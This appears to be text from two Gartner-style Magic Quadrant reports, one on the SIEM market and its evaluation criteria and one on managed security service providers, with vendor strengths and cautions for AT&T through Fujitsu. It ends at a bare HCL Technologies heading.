During the past year, demand for SIEM technology has remained strong. The SIEM market grew from $2.001 billion in 2015 to $2.167 billion in 2016 (see “Forecast: Information Security, Worldwide, 2015-2021, 3Q17 Update”). Threat management is now the primary driver, and general monitoring and compliance remains secondary. In North America, there continue to be many new deployments by organizations with limited security resources that need to improve monitoring and breach detection — often at the insistence of larger customers or business partners. Compliance reporting also continues as a requirement, but most discussions with Gartner clients are security-focused, and compliance reporting is regarded as “table stakes.” Demand for SIEM technology in Europe and the Asia/Pacific region remains steady, driven by a combination of threat management and compliance requirements. Growth rates in the less mature markets of the Asia/Pacific region and Latin America are much higher than those in the more mature North American and European markets. As a consequence, our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

There continue to be new deployments by larger companies that are conservative adopters of technology. Large, late adopters and smaller organizations place high value on deployment and operational support simplicity. We continue to see large companies that are re-evaluating SIEM vendors to replace SIEM technology associated with incomplete, marginal or failed deployments.

The SIEM market is mature and very competitive. We are in a broad adoption phase, in which multiple vendors can meet the basic requirements of a typical customer. The greatest area of unmet need is effective detection of targeted attacks and breaches. Organizations are failing at early breach detection, with more than 80% of breaches undetected by the breached organization. The situation can be improved with threat intelligence, behavior profiling and effective analytics. SIEM vendors continue to increase their native support for behavior analysis capabilities as well as integrations with third-party technologies, and Gartner customers are increasingly expressing interest in developing use cases based on behavior.

SIEM deployments tend to grow in scope over a three-year period to include more use cases, and more event sources. As the number and complexity of use cases increases, there is typically greater demand for resources to run, tune and operate the SIEM, and to respond to incidents.

SIEM Vendor Landscape

The vendor landscape for SIEM is evolving, with several new entrants to the Magic Quadrant this year. Exabeam, FireEye, Rapid7, Securonix and Venustech have been added, as these vendors have added support for SIEM functions, and compete for SIEM budget with other vendors in the Magic Quadrant. Venustech is based in China, with aims of expansion into Europe. Exabeam and Securonix have added SIEM functionality to their previously UEBA-focused products, and FireEye has evolved to add SIEM as a service to its advanced threat detection platform. The SIEM market continues to be dominated by relatively few large vendors — Micro Focus (including the ArcSight and Sentinel SIEMs), IBM, McAfee (previously Intel Security) and Splunk — that command more than 60% of market revenue. Smaller SIEM vendors are typically focused on specific market segments, such as buyers of their other products, buyers seeking SIEM plus monitoring services, or MSSP or MSP providers.

Leading SIEM vendors continue to focus on targeted attack and breach detection through incorporation of threat intelligence, analytics, profiling and anomaly detection, and endpoint and network activity monitoring.

Leading SIEMs have integrations with big data platforms (the vendors’ own, where they have them, or open-source options like Hadoop). A number of vendors with in-house security research capabilities (IBM, McAfee, RSA and Trustwave) provide integration with proprietary threat intelligence content. Vendors that have both SIEM and MSSP businesses (EventTracker, IBM and Trustwave) are marketing co-managed SIEM technology deployments that include a range of monitoring services. Rapid7 and FireEye offer as-a-service SIEM.

Customers adopting SIEM solutions that have emerged from UEBA vendors need to plan for changes to the way analysts use the tools. The tools primarily emphasize a user-based approach to monitoring for threats, compared to traditional approaches of event-based monitoring oriented around IP addresses and hostnames. SIEM solutions delivered entirely on big data platforms are just emerging in the market, and buyers should consider the potential operational impacts and expertise requirements, as these platforms are more complex and newer than other SIEM solutions.

Several vendors are not included in the Magic Quadrant because of a specific vertical-market focus and/or SIEM revenue and competitive visibility levels:

  • Odyssey Consultants, based in Cyprus, and LogPoint, based in Denmark, offer SIEMs based on modern, big data and analytics architectures, but currently have very limited visibility among Gartner customers.
  • FairWarning provides privacy breach detection and prevention solutions for the healthcare market that entail user activity and resource access monitoring at the application layer, and has expanded to include security monitoring for Salesforce.
  • Huntsman Security (part of Tier-3) is a SIEM vendor with a presence primarily in the U.K. and Australia. The Huntsman Enterprise SIEM can be augmented with modules to support behavioral anomaly detection and threat intelligence.
  • Lookwise (developed by S21sec) has a market presence primarily in Spain and South America. The distinguishing characteristic of Lookwise is the threat intelligence feeds from S21sec, which are focused on the banking and critical infrastructure sectors.
  • HelpSystems, with its Vityl product suite, provides operational event correlation, business process monitoring and SIEM solutions to customers in Europe and South America.

Customer Requirements — Security Monitoring and Compliance Reporting for Systems, Users, Data and Applications

Customers remain primarily focused on security use cases for SIEM, with compliance typically a secondary requirement. The security organization often wants to employ SIEM to improve capabilities for external and internal threat discovery and incident management (see “Use SIEM for Targeted Attack Detection” ). As a consequence, there are requirements for user activity and resource access monitoring for host systems and applications (see “Effective Security Monitoring Requires Context” ). In this year’s Magic Quadrant, we continue to place greater weight on capabilities that aid in targeted attack detection, including support for user activity monitoring, application activity monitoring, profiling and anomaly detection, threat intelligence, and effective analytics, as well as on incident response features.

The ongoing consideration of SIEM technology by companies with limited security resources results in demand for products that are easy to deploy and manage, and that provide security monitoring content such as correlation rules, queries, dashboards, reports and threat feeds that support basic security monitoring and compliance reporting functions.

SIEM solutions should:

  • Support the real-time collection and analysis of events from host systems, security devices and network devices, combined with contextual information for threats, users, assets and data.
  • Provide long-term event and context data storage and analytics.
  • Provide predefined functions that can be lightly customized to meet company-specific requirements.
  • Be as easy as possible to deploy and maintain.

Scalability

Scalability is a major consideration in SIEM deployments. For a SIEM technology to meet the requirements for a given deployment, it must be able to collect, process, normalize, store and analyze all security-relevant events and other context-relevant data. Minimal latency is necessary for real-time correlation and alerting. Event processing includes parsing, filtering, aggregation, correlation, enrichment, alerting, display, indexing and writing to the data store. Scalability also includes access to the data for analytics and reporting — even during peak event periods — with ad hoc query response times that enable an iterative approach for incident investigation. Behavioral analytics require the collection and analysis of data over longer time periods than typically used for real-time alerting. We characterize the size of a deployment based on three principal factors:

  • The number of event sources
  • The sustained events collected per second
  • The size of the event data store

We assume a mix of event sources that are dominated by servers, but also include firewalls, intrusion detection sensors and network devices. The boundaries for small, midsize and large deployments are not absolute, because some deployments may have a large number of relatively quiet event sources, while others will have a smaller number of very busy event sources. For example, a deployment with several busy log sources may exceed the EPS boundary for a small deployment, but will still be small architecturally.

Gartner defines a small deployment as one with 300 or fewer event sources, a sustained EPS rate of 1,500 EPS or less, and a back store sized at 800GB or less. Gartner defines a midsize deployment as one with 400 to 800 event sources, a sustained event rate of 2,000 to 7,000 EPS and a back store of 4TB to 8TB. A large deployment is defined as one with more than 900 event sources, a sustained event rate of more than 15,000 EPS, and a back store of 10TB or more. Some very large deployments have many thousands of event sources, sustained event rates of more than 25,000 EPS and a back store of more than 50TB. We may indicate that a vendor’s SIEM technology is better-suited for a small, midsize or large deployment, which means that the size is a typical or most common successful deployment for that vendor. Every vendor will have outliers.

SIEM Services

Gartner customers increasingly indicate that they are seeking external service support for their SIEM deployment, or are planning to acquire that support in conjunction with a SIEM product (see “How and When to Use Co-managed SIEM”). Motivation to seek external services includes lack of internal resources to manage a SIEM deployment, lack of resources to perform real-time alert monitoring or lack of expertise to expand the deployment to include new use cases (such as those for advanced threat detection). We expect that demand by SIEM users for such services will grow, driven by more customers adopting 24/7 monitoring requirements and implementing use cases that require deeper SIEM operational and analytics expertise.

SIEM vendors may support these needs via managed services with their own staff or outsourcing services, or using partners. SIEM offered as a service includes the maintenance of the platform by the vendor, with customers using their own resources (or other service providers) to configure content and monitor and investigate events. Managed security service providers, which offer real-time monitoring and analysis of events, and collect logs for reporting and investigation, are another option for SIEM users (see “Innovation Insight for SIEM as a Service”). For basic use cases, severely resource-constrained customers may opt for SaaS-type log management services from Loggly, Sumo Logic or others that have some security utility, but also cover operational use cases. Customer-specific requirements for event collection and storage, alerting, investigation, and reporting may prove problematic for external service providers, and SIEM users exploring services should evaluate the fit of the service provider to meet current and planned use cases.

SIEM Alternatives

The complexity and cost of SIEM, as well as emerging security analytics technologies, have driven interest in alternative approaches to collecting and analyzing event data to identify advanced attacks. The combination of Elasticsearch, Logstash and Kibana (also known as the ELK stack or Elastic Stack); Apache Spot; Apache Metron; and other tools leveraged with or natively using big data platforms like Hadoop offer data collection, management and analytics capabilities. Organizations with sufficient resources to deploy and manage these, and to develop and maintain analytics to address security use cases, may be able to get a solution that addresses a sufficient number of their requirements for a lower cost compared with commercial technologies. Gartner continues to track the development of this approach, and there is some feedback from customers that the workload involved in engineering these solutions to scale, and the development effort to support the required event sources and analysis, is significant, despite the software itself being free. This may negate the objective of being less expensive than a commercial SIEM deployment.

Organizations that lack the resources and process maturity for SIEM deployment and support, and that cannot or choose not to engage an MSSP for monitoring, can meet basic logging and review requirements with log management technologies (or services) such as Graylog or Sumo Logic with no, or very limited, security use cases supported out of the box (see “Use Central Log Management for Security Event Monitoring Use Cases” ).

There are a number of providers offering managed detection and response (MDR) services that differ from those of MSSPs, with the goal of identifying and responding to advanced threats in the customer environment — typically through the analysis of selected network and endpoint data (see “Market Guide for Managed Detection and Response Services” ). The scope of services and event sources is typically smaller than those available from an MSSP, or covered by a SIEM deployment. As such, they do not typically compete directly against the SIEM vendor or MSSP, where customers have broader use-case requirements. However, the MDR services claim effective advanced threat detection capabilities, and may compete for SIEM budget in organizations with sufficient resources to support those use cases. Gartner will continue to monitor the space to assess how MSS, MDR, logging and SIEM interact and intersect.

Evidence

Sources of information to support this analysis include feedback from Gartner customers gathered through inquiry calls, face-to-face meetings and survey/polling tools; vendor information supplied in response to a survey, product demonstration and briefings; and vendor reference opinions gathered via polling tool.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

Magic Quadrant for Managed Security Services, Worldwide

Published: 27 February 2018 ID: G00325535

Summary

Security and risk management leaders interested in managed security services for threat detection, security technology management and compliance concerns should use this Magic Quadrant to help identify and evaluate providers with the ability to deliver services globally.

Market Definition/Description

Gartner defines managed security services (MSSs) as “the remote monitoring of security events and security-related data sources, or the management of IT security technology along with security event monitoring, delivered via shared services from remote security operations centers (SOCs), not through personnel on-site nor remote services delivered on a one-on-one basis to a single customer.”

Managed security service providers’ (MSSPs’) portfolios typically include the following services:

  • Security event monitoring only, or security event monitoring along with device/agent monitoring and management, primarily in the following categories:
    • Firewalls
    • Network-based threat detection technologies, such as network intrusion detection/prevention systems (IDPS)
    • Multifunction firewalls, or unified threat management (UTM) technology
    • Security gateways for messaging or web traffic
    • Web application firewalls
    • Endpoint protection platforms (EPPs), host intrusion detection/prevention systems (HIDS/HIPS) and endpoint detection and response (EDR)
  • Security analysis and reporting of events collected from IT infrastructure and application logs
  • Reporting for service management, regulatory compliance requirements and threat detection purposes
  • Management and monitoring, or monitoring only of advanced threat defense technologies, or the provision of those capabilities as a service
  • Vulnerability scanning delivered as a service
  • Management and monitoring of customer-deployed security information and event management (SIEM) technologies
  • Incident response services (both remote and on-site)

Services, such as the ones listed below, may also be part of MSS offerings, but are not common across all providers:

  • Distributed denial of service (DDoS) protection
  • Advanced threat intelligence services (e.g., dark web monitoring)
  • Secure messaging gateways, secure web gateways and web application firewalls delivered “as a service”
  • Managed vulnerability management (e.g., end-to-end management that includes scanning, prioritization and patching on behalf of the customer)
  • Identity and access management

This Magic Quadrant evaluation primarily focuses on the services for monitored, and managed and monitored, network security devices, host-based agents, and log event analysis and reporting services for other sources required by the buyer. These functions make up the core of MSS procurements.

There are no vendors appearing in the Visionaries quadrant of this Magic Quadrant. MSS is a mature market with a core set of services that appear in most MSS engagements.

Magic Quadrant

Figure 1. Magic Quadrant for Managed Security Services, Worldwide

Source: Gartner (February 2018)

Vendor Strengths and Cautions

AT&T

AT&T is a global telecommunications and IT services provider that offers a range of security device management and monitoring services for large enterprises, midsize businesses and governments. Headquartered in the U.S. (Dallas), and with regional offices in the U.K. (London) and Hong Kong, AT&T delivers services from five 24/7 SOCs (one Europe-based, one Asia/Pacific-based and three U.S.-based) and three SOCs operating local business hours (one in the Asia/Pacific region, one in Brazil and another in Europe). Customers served by an SOC operating local business hours and seeking after-hours support are routed to a 24/7 location with local language support. AT&T Threat Manager is its security event monitoring and management service, which is priced by events per day (EPD). Threat correlation and analysis is performed via the AT&T Threat Intellect platform, which leverages both commercial SIEM technologies and big data technologies and analytics, and is delivered to customers as part of AT&T’s Threat Management and Intelligence solutions. Device management is available through discrete managed security offerings for network security, data and application security, and mobile and endpoint security. Device management and workflow are handled through the AT&T Business Center portal, which also provides access to the Threat Manager view. The vendor offers threat intelligence via the AT&T Internet Protect service. AT&T supports in-country/customer premises data management in all regions, and can use local partners for device management to meet data residency requirements.

AT&T should be considered by organizations with a preference for services to be sourced from a single supplier, particularly managed network services and IT infrastructure security controls that need to be deployed, managed and monitored across the customer’s environment (both on-premises and cloud services) and the provider’s environment.

STRENGTHS
  • AT&T provides a wide scope of security-focused managed and monitoring services, with a strength in network-based security solutions. The security portfolio complements its managed network infrastructure and service offerings.
  • AT&T provides an integrated business portal where customers can access a variety of services, including accessing the Threat Manager portal along with portals for device management and vulnerability management services. The Threat Manager portal provides a strong user experience for both analysts and management personas, including customized dashboards, a risk trend feature and case management.
  • AT&T has moderate visibility with Gartner clients considering discrete MSSs.
CAUTIONS
  • AT&T provides support for Amazon Web Services (AWS) environment monitoring, but lacks support for Microsoft Azure and supports only a limited set of SaaS providers (e.g., Office 365, Box and Salesforce are supported). Cloud access security broker (CASB) support is limited to SkyHigh Networks. Buyers should confirm support for their preferred SaaS vendors and other CASB vendors.
  • Customers wanting to leverage advanced threat detection technologies should confirm AT&T’s ability to monitor, and manage, preferred solutions as required, through either standard or custom delivery. AT&T has introduced a network-based forensic service that is only available to U.S. customers at this time due to data privacy restrictions. Customers outside the U.S. that are interested in this service should confirm future availability.
  • AT&T’s MSS business is most visible in the North American market, with lower visibility in Europe and little in the Asia/Pacific market. Buyers requiring a strong presence in the Asia/Pacific region should closely evaluate AT&T’s coverage there.

Atos

Atos is a global IT, digital service and software company with headquarters near Paris and regional offices in the U.S. (Purchase, New York) and Singapore. In addition to the vendor’s MSSs under the Cyber Security Services business, Atos provides a wide range of consulting, system integration, managed IT services and other offerings. Atos’ MSSs are delivered through a network of 14 24/7 SOCs (three in the U.K., six in continental Europe, two in the U.S., two in India and one in Malaysia). Atos recently acquired Anthelio Healthcare Solutions, providing capabilities in the Internet of Things (IoT)/OT space for managing privacy and compliance risks in the North American market. Atos provides threat intelligence and vulnerability notifications to customers using tools and services from partners like McAfee and Tripwire. Atos offers incident response and remediation activities as part of its core services in the form of forensic analysis and custom malware analysis, as well as offering optional threat hunting services and EDR leveraging CrowdStrike, for example. Advanced threat detection and monitoring services are available as part of Atos’ Prescriptive Security SOC offering, which leverages Atos’ proprietary big data analytics solution (Atos Codex) as well as technologies like user and entity behavior analytics (UEBA). In addition, IT/OT/IoT SOC services are developed and delivered together with Siemens.

Atos’ existing IT services customers and European-headquartered organizations with global coverage requirements that want a provider that can deliver end-to-end security management and monitoring services should consider the vendor for MSSs.

STRENGTHS
  • Customers requiring advanced analytics capabilities can opt for Atos’ flexible options leveraging Atos Codex, leading UEBA technologies or both.
  • Atos has a range of experience in securing transformational digital business projects within large enterprises, driven by its wider range of IT services engagements.
  • Atos supports customers that require end-to-end security management, monitoring and response, and offers standardized and customized solutions.
  • Atos partners with leading security technology vendors in areas such as network traffic analytics, endpoint protection, EDR, DDoS mitigation and encryption.
CAUTIONS
  • Atos Codex is currently only available to customers that opt for a dedicated McAfee SIEM platform. Atos indicates that adding Codex to the shared platform is on its roadmap. Customers that plan to leverage their shared SIEM platform and want advanced analytics capabilities should confirm availability.
  • Atos’ MSS portal is oriented toward reporting and dashboards to communicate information to customers, and provides limited support for bidirectional customer interaction.
  • Atos can monitor SaaS vendors supported within the McAfee Enterprise Security Manager (ESM) solution. Buyers should confirm support for monitoring of their preferred SaaS vendors and CASB solutions.
  • Atos is rarely mentioned by Gartner clients interested in stand-alone MSS engagements.

BAE Systems

BAE Systems, headquartered in Farnborough, U.K., offers a range of products and services in areas such as national defense, financial services and cybersecurity to industry and governments. The MSS group is headquartered in Guildford, U.K., with key offices in New York City, Dubai, Singapore and Sydney. Its offerings include Security Event Monitoring (SEM), Complete Security Monitoring (CSM), Managed Detection and Response (MDR), and Security Device Management (SDM). Services are delivered using five 24/7 SOCs — one in the U.K., three in the U.S. and one in the Philippines. Data residency requirements are typically met by retaining data locally and in geospecific cloud infrastructure. In the Asia/Pacific region, a local partner delivers services and cloud storage is not yet available. The BAE analytics platform uses a combination of commercial SIEM technologies and a big data and analytics, Hadoop-based platform. BAE supports common IaaS and security-as-a-service vendors such as Amazon CloudFront, AWS CloudTrail, Symantec.cloud, Cisco ScanSafe and Proofpoint. On-site and remote incident and breach response services are available via retainer.

BAE Systems has a customer base of large enterprise businesses in EMEA, primarily leveraging its CSM and MDR services, and a large customer base of small or midsize businesses (SMBs) in North America, primarily leveraging its NSM and SDM services. The vendor delivers its MSS offering using a combination of proprietary and commercial solutions, depending on the customer’s region and based on data privacy or residency requirements.

Companies in the financial services, legal, healthcare, media, critical infrastructure and defense markets that need a range of security monitoring, device management and advanced threat defense solutions should consider BAE Systems.

STRENGTHS
  • Advanced detection capabilities are supported by proprietary BAE Systems technology with its passive Network Probe Sensor and EDR agent. Customers that have not deployed commercial technologies for these functions can have these capabilities provided as a service.
  • BAE Systems’ MSS is augmented by a range of incident response services, including response and threat containment capabilities that are built into the MSS relationship, retainer-based response contracts, and incident response program development services.
  • Customer marks on BAE Systems’ threat detection capabilities are above average.
CAUTIONS
  • Most BAE Systems customers are in North America, with a small number in the Europe and Asia/Pacific regions. In the Asia/Pacific region, a partner delivers services for customers that require local data storage. Prospective customers with data residence or service delivery requirements specific to the Asia/Pacific region should validate the availability of services from BAE Systems.
  • The MSS portal offers limited reporting capabilities and management of vulnerability scans compared to those of leading competitors. Threat intelligence is provided through a separate portal.
  • SaaS monitoring is limited to Office 365. There are no MSS integrations with CASB solutions. BAE Systems indicates that support for CASB vendors is on its roadmap.

BT

BT is headquartered in London with key offices globally, including London, Hong Kong and Dallas. BT has six European SOCs and four Asia/Pacific region SOCs providing 24/7 service, with an additional four non-24/7 SOCs worldwide. BT provides a range of telecommunications, cloud-enabled hosting, cloud brokering and integration, and collaboration services, in addition to managed security services. BT’s MSS offerings have been under the BT Security brand name since 1Q17. BT Security’s MSS portfolio includes a range of offerings primarily within the Managed Security Services and Security Intelligence portfolios. Security Intelligence includes services such as Security Log Management (SLM), Security Threat Monitoring (STM), Cyber Security and Security Threat Intelligence. Technology management is under Managed Security Services and includes managed firewalls, DDoS, web, email, PKI and cloud security. Additional offerings include Security Vulnerability Scanning (SVS) for managed vulnerability scanning and Managed SIEM for McAfee ESM, LogRhythm and IBM QRadar customers. BT’s strategy for managed security services is evolving to emphasize its Managed SIEM and Cyber Security Platform offerings for existing BT customers and global enterprise buyers that require more one-to-one-oriented services, as opposed to delivery using a shared analytics platform that this research primarily assesses. BT has two separate portals for security technology management (Security Hub) and monitoring services (Security Threat Monitoring), which BT has been revamping over the last 12 months. Consulting services are available to meet a variety of customer demands. Incident response support, available as a retainer, is delivered in partnership with FireEye-Mandiant and other firms. BT can meet requirements for data residency with in-region/in-country service provision and citizenship requirements for SOC staff.

Global enterprises seeking global MSS capabilities to satisfy complex security requirements should consider BT.

STRENGTHS
  • BT can support customers that require integrated cloud services (hosting and/or brokering) and MSSs, especially security threat monitoring.
  • BT has many partnerships with security technology and service vendors that are leveraged to provide broad support for device management, as well as threat monitoring services. Customers requiring custom solutions will also benefit from these partnerships.
  • Customers give BT above-average marks for overall service satisfaction.
CAUTIONS
  • BT’s efforts to upgrade its portal have resulted in incremental improvements, with further enhancements planned. Customer self-service options in these portals for basic functions, like account management, ticket ownership and management, and interacting with SOC staff, are very limited compared to competitors.
  • BT’s own big data technology and advanced analytics capabilities are currently limited to buyers purchasing its Cyber Security Platform (CSP), which can be delivered as a stand-alone on-premises or hosted solution. BT indicates elements of CSP are on the roadmap to be extended to other BT Security services, such as STM.
  • BT has low visibility with Gartner clients for stand-alone MSS deals. MSSs are commonly bundled with larger networking, cloud services and cybersecurity (e.g., on-premises SOC build-outs) initiatives with BT.

Capgemini

Capgemini, with headquarters in Paris and regional offices located in North America, Europe and the Asia/Pacific region, provides MSS as part of its Cybersecurity Services business. Capgemini delivers services from seven 24/7 SOCs located in India (Mumbai and Bangalore), and regional SOCs in Luxembourg; Toulouse, France; Madrid; and Inverness, Scotland, for customers with data residency and sovereignty requirements. There is one non-24/7 SOC in India. Capgemini provides a variety of MSSs. Log management and security event monitoring are supported via its shared QRadar SIEM solution, with flexible options for dedicated QRadar instances. Five further SIEM solutions (Huntsman Enterprise SIEM, Micro Focus ArcSight, McAfee ESM, RSA NetWitness and Splunk) are supported based on customer preference, or for customers wanting management of their existing SIEM tool. Customer access to services is via the MSS Portal, which provides a basic dashboard, case management and reporting-oriented interface to the services provided to customers. Capgemini provides a tiered service approach (Bronze, Silver and Gold) to MSS buyers based on the level of services and support required. Additional services include management and monitoring for vulnerability scanners, firewalls, endpoint protection, NIDS/NIPS, web application firewalls (WAFs), CASB, and data loss prevention. Additional services are available that cover consulting and advisory, identity and access management, and DDoS, among others.

MSS buyers looking for flexible options for SIEM tools and a wide portfolio of device management and security monitoring services, as well as existing Capgemini customers, should consider Capgemini for MSS.

STRENGTHS
  • Capgemini offers support for a wide variety of SIEM solutions, as well as other security technologies.
  • Capgemini leverages its own threat intelligence network for gathering intelligence to complement third-party commercial sources, which is utilized by its SOC and visible to customers.
  • There is local and regional data residency and sovereignty support for European customers via dedicated local SOCs and data centers.
  • Capgemini offers specific consulting and security monitoring services tailored to customers with ICS/SCADA and IoT environments.
CAUTIONS
  • Capgemini’s portal lags competitors as its focus is on service visibility, management and reporting. Features like log searching and compliance reporting are not yet supported. Capgemini is actively adding enhancements to the portal, and has recently introduced support for multifactor authentication, a chat function with SOC staff and the ability to import vulnerability scanner data.
  • North American and Australian customers requiring that services be delivered domestically should confirm plans for future expansion of SOCs in those regions.
  • Capgemini has limited visibility with Gartner clients for MSS-specific deals. Capgemini’s MSS deals are often included as part of end-to-end cybersecurity outsourcing or digital transformation initiatives.

CenturyLink

CenturyLink is based in Monroe, Louisiana, and has regional offices in Singapore and London. On 1 November 2017, CenturyLink completed the acquisition of Level 3 Communications, expanding its global presence and security service portfolio. CenturyLink provides telecommunications and public and private cloud services, in addition to MSSs. MSS can be acquired as a stand-alone service or as an add-on to other CenturyLink services. With the acquisition of Level 3, CenturyLink now has more than five 24/7 SOCs operating on four continents, including North America, Europe (London), Asia/Pacific (Singapore) and Latin America (Buenos Aires, Argentina, and Sao Paulo, Brazil). There are dedicated North American and U.K. SOCs to support national government contracts. CenturyLink provides a full scope of monitoring and management activities across a broad spectrum of security platforms, including next-gen firewalls, UTM systems, network and host IPS, WAF, VPN, EPP, email and web security, vulnerability scanning, threat intelligence services (from both legacy CenturyLink and Level 3), and advanced threat-oriented capabilities (e.g., network customer traffic analyzed against threat intelligence and advanced analytics for behavioral anomalies). CenturyLink uses a combination of proprietary implementations of big data platforms and other tools (such as from its previous acquisition of Cognilytics) and commercial products to collect, store and analyze customer log data and manage workflow. There are several service tiers available, from basic endpoint security management to advanced threat-oriented capabilities. Incident response, including on-site breach response services, is available with a retainer fee. Some data residency and staff citizenship requirements can be met with in-region SOCs and data storage. The pricing model for MSS depends on the services taken and includes set monthly recurring or usage-based fees; for example, threat monitoring is based on GB-per-day data.

Existing network services, infrastructure as a service (IaaS) and cloud service customers, as well as organizations with global service requirements, should consider CenturyLink for MSSs.

STRENGTHS
  • The MSS portal, which continues to see ongoing enhancements, provides fine-grained role mapping and access for users, and provides easy-to-use report creation and customization features.
  • CenturyLink offers several options for storing customer log data ranging from customer premises to regional CenturyLink data centers to commercial or CenturyLink cloud infrastructure.
  • CenturyLink’s expansion of its global SOC presence, which also increased with the acquisition of Level 3, now offers customers a local presence on four continents.
  • Customers give CenturyLink good marks for the ability to detect threats, and would generally recommend the service to other buyers.
CAUTIONS
  • All managed services are available across the globe, except for services leveraging EDR and endpoint forensic tools, which may be limited to specific tools depending on the customer’s geography. Advanced threat detection and forensics capability based on packet capture and analysis is not yet available, but is planned for 2018. Organizations seeking support for these tools, particularly use of EDR tools outside of the U.S., should validate timing and support availability with CenturyLink.
  • CenturyLink has made enhancements to its portal over the last 12 months, but the portal still has limited features for capturing and using assets and their business value, and does not currently support integrations to enable managing vulnerability scans or viewing scan results.
  • CenturyLink has low visibility with Gartner clients for stand-alone MSS deals. CenturyLink’s current focus is selling MSSs to existing enterprise customers, although it does sell discrete MSSs to non-CenturyLink customers.

DXC Technology

DXC Technology, a newly formed entity as the result of the merger of CSC and Hewlett Packard Enterprise’s (HPE’s) Enterprise Services business, is headquartered in Tysons, Virginia. The merger formally concluded in March 2017. The vendor has 16 SOCs across the Americas, EMEA and the Asia/Pacific region. DXC offers a range of security implementation and consulting services other than MSSs for enterprise and government customers. In addition to security monitoring and device management, DXC does offer additional standard managed services like managed SIEM, managed EDR, vulnerability assessment and DDoS protection, among others. The vendor differs from many other MSSPs in that it offers a range of managed services around identity and access management, such as Identity Management as a Service and Privileged Account Management. As an MSS provider, DXC is currently in a state of consolidation and change, in terms of both the technology platforms used for MSS delivery and new services that the provider is planning to introduce.

Customers requiring globally delivered MSS, especially those looking for a partner that also offers additional IT and security services, should consider DXC for MSSs.

STRENGTHS
  • DXC has a large revenue and incumbent base of security service customers, and has the ability to support large enterprise engagements across geographies.
  • DXC has a large partner network for security technologies and a strong portfolio of supported technologies, in addition to an extensive set of security-related service offerings.
  • DXC can support customers with hybrid cloud environments that require security monitoring and management services.
CAUTIONS
  • Following the merger of HPE’s Enterprise Services business and CSC, DXC continues to support two separate portals for its MSS customers. Several key portal elements are at a basic stage or still in the process of being introduced to the customer portals (asset management, multilanguage support, reporting, etc.). Log storage and search capabilities using big data technologies are currently being deployed globally.
  • Due to the merger, DXC has 16 SOCs across the world today, with a stated intention to consolidate SOCs located in the same local areas. Customers and prospects should carefully investigate the impact of this planned consolidation on the delivery of their service.
  • DXC, particularly as a new brand, rarely shows up on Gartner client shortlists for pure-play MSS deals.

Fujitsu

Fujitsu is headquartered in Tokyo, with key offices in London; Munich; Lisbon; Richardson, Texas; and Sunnyvale, California. Fujitsu has a large operational presence in Europe and Japan, with 24/7 SOCs in Japan (nine total), Australia, Singapore, India, Germany, the U.K., Finland and the U.S. Fujitsu’s security portal is primarily an interface to its underlying delivery platform, which is built on LogRhythm’s SIEM solution. Fujitsu has an in-house Cyber Threat Intelligence (CTI) capability, which leverages a range of commercial and open-source feeds and partnerships with third parties, and which underpins the threat analytics and detection capabilities within its MSSs. The CTI capability is also delivered as a stand-alone offering. Incident response support and consultancy is available as a retainer. Advanced threat detection capabilities for endpoints and networks, as well as sandboxing, leverage technology from partners such as FireEye, Check Point Software Technologies, McAfee, Symantec and others. Malware analysis is available on a range of commercial and open-source toolsets, and forensic analysis is delivered via Fujitsu consulting and partners as needed.

Buyers, including existing Fujitsu IT services customers, should consider Fujitsu for MSSs if they are looking for a provider that offers flexibility for service delivery, or if they already have IT services that can be easily integrated and would benefit from security enhancements.

STRENGTHS
  • Fujitsu provides managed services across a wide portfolio of technologies, including firewalls, UTM, endpoint protection and encryption, IDS/IPS, WAFs, VPN and remote access services, email security, data loss prevention, and identity and access management, in addition to its CTI, threat analytics and advanced threat detection offerings.
  • Fujitsu’s reach in the Asia/Pacific region and Europe is strong.
  • Fujitsu leverages leading SIEM technologies to deliver its security event monitoring and threat analytics and detection capabilities.
CAUTIONS
  • Fujitsu’s technology integrations, partnerships and service delivery methodology for MSS are less mature compared to competing vendors.
  • Fujitsu’s security portal is based purely on access to its LogRhythm platform. Service management functionality, including ticket management, customer communications and management dashboards, lags behind competitors.
  • Fujitsu has very low visibility with Gartner clients looking for discrete MSSs.

HCL Technologies

